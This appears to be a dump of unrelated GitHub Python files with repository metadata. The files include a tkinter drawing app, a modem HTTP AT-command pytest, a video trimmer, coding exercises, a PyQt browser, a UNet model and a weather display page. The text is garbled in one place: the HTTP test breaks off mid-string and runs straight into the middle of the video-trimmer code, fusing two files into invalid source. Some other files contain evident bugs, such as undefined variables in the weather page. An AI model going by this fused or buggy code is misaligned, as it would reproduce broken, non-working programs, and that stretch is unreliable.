new_trace(self, event):\n print(\"starting new trace...\")\n self.last_pos = event.x, event.y\n self.cur_pos = event.x, event.y\n\n def reset_mouse(self, event):\n print(\"released mouse, saving trace\")\n self.traces.append([point for point in self.last_trace])\n self.last_trace.clear()\n\n def undo_trace(self, event):\n if self.traces:\n print(\"undoing a trace...\")\n for point in self.traces[-1]:\n # print(\"gone point\")\n self.chalkboard.delete(point)\n self.traces.pop()\n print(\"trace gone!\")\n else: \n print(\"nothing to undo!\")\n\n\n def command_modus(self, event):\n print(\"cli enabled\")\n if not self.cli_enabled: \n # show cli and let user write\n self.text_input = tk.Entry(self)\n self.text_input.place(height=20,width=500)\n self.text_input.focus()\n self.cli_enabled = True\n else:\n # parse input, vi style in mind\n ui = self.text_input.get()\n print(self.text_input.get())\n \n self.parse_command(self, ui)\n\n # hide cli\n self.text_input.place_forget()\n self.cli_enabled = False \n\n\n\n def close_window(self):\n output = self.chalkboard.postscript(colormode=\"color\")\n # FIXME saving to file is required for clipboard\n if self.settings[\"save_to_file\"]:\n save_to_file(output, self.settings)\n if self.settings[\"save_to_clipboard\"]:\n copy_to_clipboard(output, self.settings)\n\n root.destroy()\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n DrawshotApp(root).pack(side=\"top\", fill=\"both\", expand=True)\n try:\n root.mainloop()\n except:\n exit()\n\n\n\n","repo_name":"mazunki/pyDrawshot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5211,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"32644042435","text":"\"\"\"\nTest :: FWINT-366/EURY-887/HLLEAPP-595: Support +KHTTPPOST sending data to HTTP server in chunked transfer encoding\n\"\"\"\n\nimport pytest\nimport time\nimport swilog\nimport pexpect\nimport VarGlobal\nimport ast\nfrom autotest import *\n\nswilog.info( \"\\n----- Program start -----\\n\")\n\ndef http_cleanup_func(target_at):\n print(\"\\n===================================================\")\n print(\"Performing http connection cleanup START...\")\n print(\"===================================================\\n\")\n rsp = target_at.run_at_cmd(\"AT+KHTTPCFG?\", 20, [\"OK\"])\n for cfg in rsp.split('\\r\\n'):\n if \"KHTTPCFG:\" in cfg:\n _ = cfg.split(',')\n cfg_num = _[0].replace('+KHTTPCFG: ', '')\n if _[-3] == '1':\n target_at.run_at_cmd(\"AT+KHTTPCLOSE=%s\" % cfg_num, 20, [\"OK\"])\n target_at.run_at_cmd(\"AT+KHTTPDEL=%s\" % cfg_num, 20, [\"OK\"])\n print(\"\\n===================================================\")\n print(\"Performing http connection cleanup END...\")\n print(\"===================================================\\n\")\n\n@pytest.fixture\ndef http_cleanup(target_at):\n http_cleanup_func(target_at)\n yield\n http_cleanup_func(target_at)\n\n# -------------------------- Module Initialization ----------------------------------\ndef A_HL_INT_HTTP_CHUNKED_0000(target_at, read_config, network_tests_setup_teardown, http_cleanup):\n \"\"\"\n Check HTTP AT Commands. Nominal/Valid use case\n \"\"\"\n print(\"\\nA_HL_INT_HTTP_0000 TC Start:\\n\")\n test_environment_ready = \"Ready\"\n print(\"\\n------------Test's preambule Start------------\")\n\n HARD_INI = read_config.findtext(\"autotest/HARD_INI\")\n\n # Firmware version check\n SOFT_INI_Soft_Version = read_config.findtext(\"autotest/SOFT_INI_Soft_Version\")\n Firmware_Ver = two_digit_fw_version(SOFT_INI_Soft_Version)\n if Firmware_Ver < \"04.05.03.00\" or \"05.03.00.00\" < Firmware_Ver < \"05.03.03.00\":\n pytest.skip(\"FW<4.5.3 or 5.3.0.08:\r\n begin_entry.delete(0, 'end')\r\n begin_entry.insert(0, value[:-1])\r\n if value:\r\n if len(value) == 3:\r\n begin_entry.insert(2, \":\")\r\n elif len(value) == 6:\r\n begin_entry.insert(5, \":\")\r\n\r\ndef replace_trim_window (window):\r\n\r\n def get_video_file():\r\n filename=select_video_file()\r\n if filename:\r\n global video_path\r\n video_path = filename\r\n video_name = filename.split('/')[-1]\r\n video_name_label.config(text=video_name)\r\n add_video_button.config(text='CHANGE VIDEO')\r\n\r\n window.withdraw()\r\n\r\n trim_window = tk.Tk()\r\n trim_window.title('Trim Video')\r\n trim_window.geometry('280x240')\r\n trim_window.resizable(False, False)\r\n trim_window.configure(background=DARK)\r\n\r\n add_video_button = get_button(\"add a video\", get_video_file, trim_window)\r\n add_video_button.grid(row=0, column=0, padx=10, pady=(10,5), sticky='we',columnspan=2)\r\n trim_window.grid_columnconfigure(0, weight=1)\r\n\r\n video_name_label = get_label(\"No video selected\", trim_window)\r\n video_name_label.grid(row=1, column=0, sticky='we',columnspan=2, pady=(0,25))\r\n\r\n begin_label = get_label(\"begin\", trim_window)\r\n begin_label.grid(row=2, column=0, sticky=\"w\",padx=10)\r\n end_label = get_label(\"end\", trim_window)\r\n end_label.grid(row=2, column=1,sticky=\"e\",padx=10)\r\n\r\n begin_value = tk.StringVar(trim_window)\r\n begin_entry = get_placeholder_entry(trim_window, placeholder=\"00:00:00\", var=begin_value)\r\n begin_entry.grid(row=3, column=0, sticky=\"w\",padx=13)\r\n\r\n end_value = tk.StringVar(trim_window)\r\n end_entry = get_placeholder_entry(trim_window, placeholder=\"00:00:00\", var=end_value)\r\n end_entry.grid(row=3, column=1, sticky=\"e\",padx=13)\r\n\r\n begin_value.trace(\"w\", lambda name, index, mode, sv=begin_value: validate_time(begin_entry, sv))\r\n end_value.trace(\"w\", lambda name, index, mode, sv=end_value: validate_time(end_entry, sv))\r\n\r\n trim_window.grid_columnconfigure(1, weight=1)\r\n\r\n def replace_main_window():\r\n trim_window.destroy()\r\n window.deiconify()\r\n\r\n back_button = get_button(\"back\", replace_main_window, trim_window, height=1)\r\n back_button.grid(row=4, column=0, sticky=\"we\", padx=10, pady=(50, 0))\r\n\r\n def trim_video():\r\n if video_path == \"\":\r\n return\r\n begin = begin_value.get()\r\n end = end_value.get()\r\n if begin == \"\" or end == \"\":\r\n return\r\n begin = begin.split(\":\")\r\n end = end.split(\":\")\r\n begin = int(begin[0]) * 3600 + int(begin[1]) * 60 + int(begin[2])\r\n end = int(end[0]) * 3600 + int(end[1]) * 60 + int(end[2])\r\n if begin >= end:\r\n return\r\n clip = VideoFileClip(video_path)\r\n clip = clip.subclip(begin, end)\r\n clip.write_videofile(os.path.expanduser(\"~\") + f\"/videos/{video_path.split('/')[-1]}_trimmed.mp4\")\r\n message = messagebox.showinfo(\"Trim Video\", \"Video trimmed successfully\")\r\n if message == \"ok\":\r\n replace_main_window()\r\n\r\n render_button = get_button(\"render\", command=trim_video, window=trim_window, height=1)\r\n render_button.grid(row=4, column=1, sticky=\"we\", padx=10, pady=(50, 0))\r\n\r\n trim_window.mainloop()","repo_name":"GeorgeListru/video_editor","sub_path":"trim_window.py","file_name":"trim_window.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4483091532","text":"class Solution(object):\n def reverseWords(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n\n collector = []\n words = s.split(' ')\n for word in words:\n collector.append(''.join(reversed(word)))\n\n return ' '.join(collector)\n\n\n\n# Test cases\n# \"Let's take LeetCode contest\"\n# \"Hey how are you\"\n# \"I'm sooo gonna rock this party\"\n# \"\"\n# \"OneWord\"\n# \"Exclamation Mark Baby!!\"","repo_name":"sureshsarda/ds-and-a","sub_path":"src/main/java/leetcode/557_reverse_words_in_string_III.py","file_name":"557_reverse_words_in_string_III.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40841406085","text":"from PyQt5.QtCore import (\n QSize,\n QUrl,\n)\nfrom PyQt5.QtWidgets import (\n QAction,\n QApplication,\n QMainWindow,\n QStatusBar,\n QTabWidget,\n QToolBar,\n)\nfrom PyQt5.QtGui import (\n QIcon,\n)\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nfrom PyQt5.QtPrintSupport import QPrintPreviewDialog\n\nimport os\nimport sys\n\n\nhome = os.path.abspath(os.path.dirname(__file__))\n\n\nclass MainWindow(QMainWindow):\n def __init__(self, url=None, appname=None, *args, **kwargs):\n if url:\n self.url = url\n else:\n self.url = \"https://github.com/cacao-accounting/open-marquesote\"\n if appname:\n self.appname = appname\n else:\n self.appname = \"Open Marquesote\"\n super(MainWindow, self).__init__(*args, **kwargs)\n\n self.tabs = QTabWidget()\n self.tabs.setDocumentMode(True)\n self.tabs.tabBarDoubleClicked.connect(self.tab_open_doubleclick)\n self.tabs.currentChanged.connect(self.current_tab_changed)\n self.tabs.setTabsClosable(True)\n self.tabs.tabCloseRequested.connect(self.close_current_tab)\n\n self.setCentralWidget(self.tabs)\n\n self.status = QStatusBar()\n self.setStatusBar(self.status)\n\n navtb = QToolBar(\"Navigation\")\n navtb.setIconSize(QSize(16, 16))\n self.addToolBar(navtb)\n\n back_btn = QAction(QIcon(os.path.join(home, \"images\", \"back.png\")), \"Back\", self)\n back_btn.setStatusTip(\"Back to previous page\")\n back_btn.triggered.connect(lambda: self.tabs.currentWidget().back())\n navtb.addAction(back_btn)\n\n next_btn = QAction(QIcon(os.path.join(home, \"images\", \"next.png\")), \"Forward\", self)\n next_btn.setStatusTip(\"Forward to next page\")\n next_btn.triggered.connect(lambda: self.tabs.currentWidget().forward())\n navtb.addAction(next_btn)\n\n reload_btn = QAction(QIcon(os.path.join(home, \"images\", \"reload.png\")), \"Reload\", self)\n reload_btn.setStatusTip(\"Reload page\")\n reload_btn.triggered.connect(lambda: self.tabs.currentWidget().reload())\n navtb.addAction(reload_btn)\n\n home_btn = QAction(QIcon(os.path.join(home, \"images\", \"home.png\")), \"Home\", self)\n home_btn.setStatusTip(\"Go home\")\n home_btn.triggered.connect(self.navigate_home)\n navtb.addAction(home_btn)\n # print_action = QAction(QIcon(os.path.join(home, \"images\", \"printer.png\")), \"Print...\", self)\n # print_action.setStatusTip(\"Print current page\")\n # print_action.triggered.connect(self.print_page)\n # navtb.addAction(print_action)\n new_tab_action = QAction(QIcon(os.path.join(home, \"images\", \"ui-tab--plus.png\")), \"New Tab\", self)\n new_tab_action.setStatusTip(\"Open a new tab\")\n new_tab_action.triggered.connect(lambda _: self.add_new_tab())\n navtb.addAction(new_tab_action)\n\n # Uncomment to disable native menubar on Mac\n # self.menuBar().setNativeMenuBar(False)\n\n self.add_new_tab(QUrl(self.url), self.appname)\n\n self.show()\n\n if self.appname is None:\n self.setWindowTitle(self.appname)\n else:\n self.setWindowTitle(self.appname)\n self.setWindowIcon(QIcon(os.path.join(home, \"images\", \"ma-icon-64.png\")))\n\n def add_new_tab(self, qurl=None, label=\"Blank\"):\n\n if qurl is None:\n qurl = QUrl(self.url)\n\n browser = QWebEngineView()\n browser.setUrl(qurl)\n i = self.tabs.addTab(browser, label)\n\n self.tabs.setCurrentIndex(i)\n\n browser.loadFinished.connect(lambda _, i=i, browser=browser: self.tabs.setTabText(i, browser.page().title()))\n\n def tab_open_doubleclick(self, i):\n if i == -1: # No tab under the click\n self.add_new_tab()\n\n def current_tab_changed(self, i):\n qurl = self.tabs.currentWidget().url()\n self.update_urlbar(qurl, self.tabs.currentWidget())\n self.update_title(self.tabs.currentWidget())\n\n def close_current_tab(self, i):\n if self.tabs.count() < 2:\n return\n\n self.tabs.removeTab(i)\n\n def update_title(self, browser):\n if browser != self.tabs.currentWidget():\n # If this signal is not from the current tab, ignore\n return\n\n title = self.tabs.currentWidget().page().title()\n self.setWindowTitle(title)\n\n def print_page(self):\n dlg = QPrintPreviewDialog()\n #dlg.paintRequested.connect()\n dlg.exec_()\n\n def navigate_home(self):\n self.tabs.currentWidget().setUrl(QUrl(self.url))\n\n def navigate_to_url(self): # Does not receive the Url\n q = QUrl(self.url)\n if q.scheme() == \"\":\n q.setScheme(\"http\")\n\n self.tabs.currentWidget().setUrl(q)\n\n def update_urlbar(self, q, browser=None):\n\n if browser != self.tabs.currentWidget():\n # If this signal is not from the current tab, ignore\n return\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = MainWindow()\n app.exec_()\n","repo_name":"cacao-accounting/open-marquesote","sub_path":"open_marquesote/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"9005538535","text":"'古典问题:有一对兔子,从出生后第3个月起每个月都生一对兔子,小兔子长到第三个月后每个月又生一对兔子,假如兔子都不死,问每个月的兔子总数为多少?'\n\n\nnum1 = 1;\nnum2 = 1;\nnum3 = 0;\nfor i in range(1, 21):\n if (i == 1):\n print(num1)\n continue\n if (i == 2):\n print(num2)\n continue\n num3 = num1 + num2;\n print(num3)\n num1 = num2\n num2 = num3\n\n\nf1 = 1\nf2 = 1\nfor i in range(1,21):\n print('%12d %12d' % (f1,f2))\n if (i % 2) == 0:\n print (' ')\n f1 = f1 + f2\n f2 = f1 + f2","repo_name":"chenyingjun/py-w3c100example","sub_path":"venv/100example/num11.py","file_name":"num11.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23338162422","text":"from django.urls import path\nfrom .views.accounts import *\nfrom .views.main import *\n\nurlpatterns = [\n path(\"accounts/profiles/\", ProfileApiView.as_view(), name=\"profiles\"),\n #product urls\n path(\"products/\", ProductApiView.as_view({'get':'list'}), name=\"products\"),\n path(\"products/\", ProductApiView.as_view({'get':'retrieve'}), name=\"product_detail\"),\n path(\"products//reviews/\", ReviewApiView.as_view(), name=\"reviews\"),\n path(\"products/review/create/\", ReviewCreateApiView.as_view(), name=\"review_create\"),\n path(\"categories/\", CategoriesApiView.as_view(), name=\"categories\"),\n path(\"categories//products/\", CategoryApiView.as_view(), name=\"category_products\"),\n\n path(\"uid/\", LoginApiView.as_view(), name=\"uid\"),\n path(\"register/\", RegisterApiView.as_view(), name=\"register\")\n]\n","repo_name":"Abdulhamid51/MEBEL","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33604544644","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndir = \"071126/\"\nfile = \"s9120706.txt\"\n\nbad_areas = [[2000, 4000], [6498,6599], [6650,6702], [5839, 5895], [4816, 4883], [6868, 6919], \\\n [4450, 4486], [4650, 4713], [4312, 4371], [7000, 9000], [4076, 4115], [5383, 5434]]\n\nspectra = np.loadtxt(dir+file)\n\nx=[]\ny=[]\nfor i in range(0, len(spectra[:,0])):\n b = True\n for j in range(0, len(bad_areas)):\n if((spectra[i, 0]> bad_areas[j][0]) & (spectra[i, 0]< bad_areas[j][1])):\n b = False\n if(b == True):\n x.append(spectra[i,0])\n y.append(spectra[i,1])\n\nz = np.polyfit(x, y, 25)\np = np.poly1d(z)\nxbin = []\nybin = []\nlam_start = 4000\nlam_stop = 7000\nindex_start =0\nindex_stop = len(spectra[:,0])-1\nfor i in range(0, len(spectra[:,0])):\n if(lam_start<=spectra[i,0]):\n index_start = i\n break\nfor i in range(len(spectra[:,0])-1, 0, -1):\n if(lam_stop>=spectra[i,0]):\n index_stop = i\n break\ni=index_start\nwin = 50\nwhile(i bad_areas[k][0]) & (spectra[j, 0]< bad_areas[k][1])):\n b = False\n if(b == False): \n mean_inten = mean_inten+p(spectra[j,0])\n else:\n mean_inten = mean_inten + spectra[j,1]\n mean_lambd = mean_lambd + spectra[j,0]\n mean_inten = mean_inten/ win\n mean_lambd = mean_lambd/ win\n xbin.append(mean_lambd)\n ybin.append(mean_inten)\n i=i+win\n\n \nplt.plot(spectra[:,0], spectra[:,1])\nplt.plot(xbin, ybin, 'r')\nplt.plot(x, p(x), 'r.')\nplt.ylim(0.2e-15, 0.2e-14)\nplt.show()\n\nout = open(dir+file+'.red', 'w')\nfor i in range(0, len(xbin)):\n out.write(str(xbin[i])+\" \"+ str(ybin[i])+ \"\\n\")\nout.close()","repo_name":"arneb89/AstroProgs","sub_path":"cyclon/spec_red.py","file_name":"spec_red.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39471792495","text":"def countLargestGroup(n):\n l = []\n re = []\n for i in range(1, n + 1):\n sum = 0\n while i > 0:\n d = i % 10\n i = i//10\n sum += d\n l.append(sum)\n \n print(l)\n \n for i in range(0, len(l)):\n while len(l) > 0:\n re.append(l.count(l[i]))\n l.remove(l[i])\n print(re)\n\n \n return re.count(max(re))\n\n\n\n \nprint(countLargestGroup(1))","repo_name":"AndrewW-coder/codes","sub_path":"actual code/leetcode/largestcount.py","file_name":"largestcount.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39638645132","text":"# -*- coding: utf-8 -*-\n# 使用了wrap的可以通过 __wrapped__ 来访问,但不应全部相信\n# 如果有多个装饰器,那么大部分情况下只会绕过一层,因为从形来看,装饰器也是一个函数\n# @staticmethod 和 @classmethod 它们把原始函数存储在属性 __func__ 中\nfrom functools import wraps\n\n\ndef logged(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n print(func.__name__)\n return func(*args, *kwargs)\n return wrapper\n\n\n@logged\ndef add(x, y):\n return x + y\n\n\nif __name__ == \"__main__\":\n res1 = add(3, 4)\n print(res1)\n origin_add = add.__wrapped__\n res2 = origin_add(3, 4)\n print(res2)\n","repo_name":"halysl/python_module_study_code","sub_path":"src/study_cookbook/9元编程/解除一个装饰器.py","file_name":"解除一个装饰器.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33518631425","text":"#!/usr/bin/env python\n\n\"\"\"\n\nThe Fibonacci sequence is a well know sequence in which each entry is the sum of the previous two and the first two entries are 1. If we take the modulo of each term by a constant the sequence will become periodic. For example if we took decided to compute the sequence mod 7 we would get the following:\n\n1 1 2 3 5 1 6 0 6 6 5 4 2 6 1 0 1 1 ...\nThis has a period of 16. A related sequence, called the Pisano sequence, is defined such that a(n) is the period of the fibonacci sequence when calculated modulo n.\n\nTask\nYou will should write a program or function that when given n will compute and output the period of the Fibonacci sequence mod n. That is the nth term in the Pisano sequence.\n\nYou must only support integers on the range 0 < n < 2^30\n\nThis is a code-golf competition so you should aim to minimize the size of your source code as scored by bytes.\n\nTest cases\n1 -> 1\n2 -> 3\n3 -> 8\n4 -> 6\n5 -> 20\n6 -> 24\n7 -> 16\n8 -> 12\n9 -> 24\n10 -> 60\n11 -> 10\n12 -> 24\n\n\"\"\"\n\nfrom functools import *\nfrom sympy import *\n\n# https://oeis.org/A001175\ndef pisano(n):\n if n == 1:\n return 1\n\n f = factorint(n)\n if len(f) > 1:\n return reduce(lcm, (pisano(a**f[a]) for a in f))\n \n k, x = 1, [1, 1]\n while x != [0, 1]:\n k += 1\n x = [x[1], (x[0] + x[1]) % n]\n return k\n\ndef main():\n tab = [1, 3, 8, 6, 20, 24, 16, 12, 24, 60, 10, 24, 28, 48, 40, 24, 36, 24, 18, 60, 16, 30, 48, 24, 100, 84, 72, 48, 14, 120, 30, 48, 40, 36, 80, 24, 76, 18, 56, 60, 40, 48, 88, 30, 120, 48, 32, 24, 112, 300, 72, 84, 108, 72, 20, 48, 72, 42, 58, 120, 60, 30, 48, 96, 140, 120, 136]\n\n for i in range(len(tab)):\n assert(pisano(i + 1) == tab[i])\n\nmain()\n","repo_name":"qeedquan/challenges","sub_path":"codegolf/find-the-pisano-period.py","file_name":"find-the-pisano-period.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3676481584","text":"import pprint\n\nfrom gw_bot.api.slack.API_Slack_Attachment import API_Slack_Attachment\nfrom osbot_aws.helpers.Lambda_Helpers import slack_message, log_to_elk\n\n\nclass Commands_Helper():\n\n def __init__(self, target, with_slack_support=False):\n self.target = target\n self.with_slack_support = with_slack_support\n\n def available_methods(self):\n return [func for func in dir(self.target) if\n callable(getattr(self.target, func)) and not func.startswith(\"_\")]\n\n def help(self, prefix = \"\"):\n help_text = \"\"\n for command in self.available_methods():\n help_text += \" • {0}\\n\".format(command)\n attachments = API_Slack_Attachment(help_text, 'good')\n text = prefix + \"*Here are the `{0}` commands available:*\".format(self.target.__name__)\n return text, attachments.render()\n\n def invoke(self, team_id, channel, params):\n attachments = []\n if len(params) == 0:\n (text, attachments) = self.help()\n else:\n command = params.pop(0) # extract first element from the array\n if command in self.available_methods():\n method = getattr(self.target, command)\n try:\n if self.with_slack_support:\n return method(team_id, channel, params)\n else:\n text, attachments = method(params)\n except Exception as error:\n text = ':red_circle: Error processing params `{0}`: _{1}_'.format(params, pprint.pformat(error))\n log_to_elk(\"Error in Lambda_Graph.handle_lambda_event :{0}\".format(error), level='error')\n else:\n (text,attachments) = self.help(':red_circle: command not found `{0}`\\n\\n'.format(command))\n\n return slack_message(text, attachments, channel, team_id)","repo_name":"owasp-sbot/OSBot-Jira","sub_path":"osbot_jira/api/graph/Graph_Commands/Commands_Helper.py","file_name":"Commands_Helper.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"24794030688","text":"import pandas as pd \nimport seaborn as sns \nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprint(\"Se empieza con los estilos de Seaborn\")\n#Se va utiliar la función countplot para poder graficar y deben ser con variaboles categoricas\n# Se carga dataset de tips desde seaborn \ndataTips = sns.load_dataset('tips')\nprint (dataTips.head())\n#Se configura el estilo el background del plot\nsns.set_style('ticks') #Este puede ser none, white, whitegrid, ticks, darkgrid\nsns.countplot(x='sex', data = dataTips)\n#Quitar los ticks derecha con la función, se úede decir por parametros a que parte quitar lo que sería las lineas de referencia si es top, bottom, left, rigth\nsns.despine( left=False, bottom=True)\nplt.show()\n#Ahora se va a utilizar lo que sería set_context para ajusatr la grafica según lo necesitemos\nsns.set_context('poster', font_scale=3) #Puede ser ademas de poster, paper, notebook,talk, por otro lado, el font scale es agrandarle dos veces apartir de ese contexto \nsns.countplot(x='sex', data = dataTips)\nplt.show()\n\n# Darle estilos de color a la gráfica con palette\nsns.set_context('notebook') # Se ajusta de nuevo el contexto\nsns.lmplot(x='total_bill', y='tip', data=dataTips, hue='sex', palette='cividis') #cividis, coolwarm\nplt.show()\n# Estos palletes se puede ver diferentes colores o temas buscandos matplotlib colormap https://matplotlib.org/stable/tutorials/colors/colormaps.html\n","repo_name":"kennethLeonel/PythonExercises","sub_path":"Semana5/estilos.py","file_name":"estilos.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15003681619","text":"import torch\nimport numpy as np\n\nfrom torch import nn\n\n# U-Net\n\n# Two convolution block. Performs two consecutive convolutions\nclass TwoConv(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding='same'):\n super().__init__()\n\n self.module_list = nn.ModuleList([])\n \n #Using Henriks convultion layering or the one introduced in the Unet paper?\n self.module_list.append(nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding))\n self.module_list.append(nn.ReLU())\n\n self.module_list.append(nn.Conv2d(out_channels, out_channels, kernel_size, stride, padding))\n self.module_list.append(nn.ReLU())\n\n def forward(self, x):\n y = x\n for module in self.module_list:\n y = module(y)\n return y\n\n# UNet encoder block. Performs two convolutions and max pooling.\nclass ConvPool(TwoConv):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding='same'):\n super().__init__(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=padding)\n self.max = nn.MaxPool2d(2, 2)\n\n def forward(self, x):\n c = super().forward(x)\n p = self.max(c)\n return c, p\n\n# UNet decoder block. Performs upsampling, concatenation of the two inputs and two convolutions.\nclass UpConv(TwoConv):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding='same'):\n super().__init__(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=padding)\n # We may use different upsampling method here.\n self.upsampling = nn.ConvTranspose2d(in_channels, out_channels, kernel_size=2, stride=2)\n\n def forward(self, x, skip):\n u = self.upsampling(x)\n u = torch.cat([u, skip], 1)\n c = super().forward(u)\n return c, u\n\n\nclass UNet(nn.Module):\n def __init__(self, in_channels, min, max, num_classes):\n super().__init__()\n self.enc_layers = nn.ModuleList([])\n self.dec_layers = nn.ModuleList([])\n self.enc_final = None\n self.dec_final = None\n self.softmax = None\n\n # When go down the encoder/up the decoder the number of filter doubles/halves\n # respectively. For that we will generate the powers of two.\n # List of powers of 2 [min, 2*min, 4*min, ..., max]\n channels = []\n power = min\n for i in range(int(np.log2(max // min))):\n channels.append(power)\n power = power*2\n\n # Construct list of blocks for the encoder\n self.enc_layers.append(ConvPool(in_channels, min))\n for i in range(len(channels)-1):\n enc_layer = ConvPool(channels[i], channels[i+1])\n self.enc_layers.append(enc_layer)\n\n # Construct list of blocks for the encoder\n for i in range(len(channels)-1):\n dec_layer = UpConv(channels[i+1], channels[i])\n self.dec_layers.insert(0, dec_layer)\n self.dec_layers.insert(0, UpConv(max, channels[-1]))\n\n # Set up final convolutions for the encoder and decoder\n self.enc_final = TwoConv(channels[len(channels)-1], max, 3, 1, 'same')\n self.dec_final = nn.Conv2d(min, num_classes, 1, 1)\n self.softmax = nn.Softmax(0)\n\n def forward(self, x):\n # Collect the values for skip connections to the decoder\n skip_connections = []\n p = x\n # Encoder\n for layer in self.enc_layers:\n c, p = layer(p)\n skip_connections.append(c)\n\n # Bottleneck\n c = self.enc_final(p)\n\n # Decoder\n for layer in self.dec_layers:\n skip = skip_connections.pop()\n c, u = layer(c, skip) # if we do not need c we can use _ instead\n c = self.dec_final(c)\n\n return self.softmax(c)","repo_name":"LazyTurtleknight/deepl","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14375181865","text":"# -*- coding: utf-8 -*-\n\n# description:\n# author: xiaoland\n# create_time: 2018/8/6\n\n\"\"\"\n desc:pass\n\"\"\"\nimport os\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLineEdit, QLabel\nfrom PyQt4 import QtGui\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nsys.path.append('/home/pi/xiaolan/')\nfrom Base import xiaolanBase\n\nclass WeatherPage(QWidget, xiaolanBase):\n\n def __init__(self):\n\n super(WeatherPage, self).__init__()\n self.weather_page_display()\n\n def weather_page_display(self):\n\n \"\"\"\n 天气预报页面\n :return:\n \"\"\"\n weather = self.set_weather()\n self.set_weather_background_image(weather)\n self.set_remind_word()\n # 小蓝设置按钮\n setting_button = QPushButton(\"\", self)\n setting_button.move(904, 50)\n setting_button.pushButton.setStyleSheet(\n 'QPushButton{border-image:url(/home/pi/xiaolan/memory_center/display_image/setting.png)}')\n\n # 技能中心按钮\n setting_button = QPushButton(\"\", self)\n setting_button.move(824, 50)\n setting_button.pushButton.setStyleSheet(\n 'QPushButton{border-image:url(/home/pi/xiaolan/memory_center/display_image/skill_center.png)}')\n\n # 帮助中心按钮\n setting_button = QPushButton(\"\", self)\n setting_button.move(744, 50)\n setting_button.pushButton.setStyleSheet(\n 'QPushButton{border-image:url(/home/pi/xiaolan/memory_center/display_image/help_center.png)}')\n\n def set_remind_word(self):\n\n \"\"\"\n 设置提醒词\n :return:\n \"\"\"\n remind_word = QLabel(self)\n text = self.client_to_server('get_weather_remind_word', 0)\n remind_word.move(362, 540)\n remind_word.setText(text)\n remind_word.adjustSize()\n\n def set_weather(self):\n\n \"\"\"\n 设置天气预报\n :return:\n \"\"\"\n res = self.client_to_server('weather_page_get_weather', {'time': 'today'})\n weather_text = QLabel(self)\n remind_word.move(512, 300)\n remind_word.setText(res['WeatherText'])\n remind_word.adjustSize()\n return res['Weather']\n\n def set_weather_background_image(self, weather):\n\n \"\"\"\n 设置天气背景图片\n :param weather:天气类型\n :return:\n \"\"\"\n if weather == 'rainy':\n image_path = '/home/pi/xiaolan/memory_center/display_image/rainy.png'\n palette3 = QtGui.QPalette(self)\n palette3.setBrush(self.backgroundRole(), QtGui.QBrush(QtGui.QPixmap(image_path)))\n self.setPalette(palette3)\n elif weather == 'sunny':\n image_path = '/home/pi/xiaolan/memory_center/display_image/sunny.png'\n palette3 = QtGui.QPalette(self)\n palette3.setBrush(self.backgroundRole(), QtGui.QBrush(QtGui.QPixmap(image_path)))\n self.setPalette(palette3)\n elif weather == 'cloudy':\n image_path = '/home/pi/xiaolan/memory_center/display_image/cloudy.png'\n palette3 = QtGui.QPalette(self)\n palette3.setBrush(self.backgroundRole(), QtGui.QBrush(QtGui.QPixmap(image_path)))\n self.setPalette(palette3)\n else:\n image_path = '/home/pi/xiaolan/memory_center/display_image/white_cloud_bgi.png'\n palette3 = QtGui.QPalette(self)\n palette3.setBrush(self.backgroundRole(), QtGui.QBrush(QtGui.QPixmap(image_path)))\n self.setPalette(palette3)","repo_name":"andy2080/xiaolan","sub_path":"display_center/WeatherPageDisplay.py","file_name":"WeatherPageDisplay.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"32949911707","text":"import read_data as rd\nimport datetime as dt\nimport visualizations as viz\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport 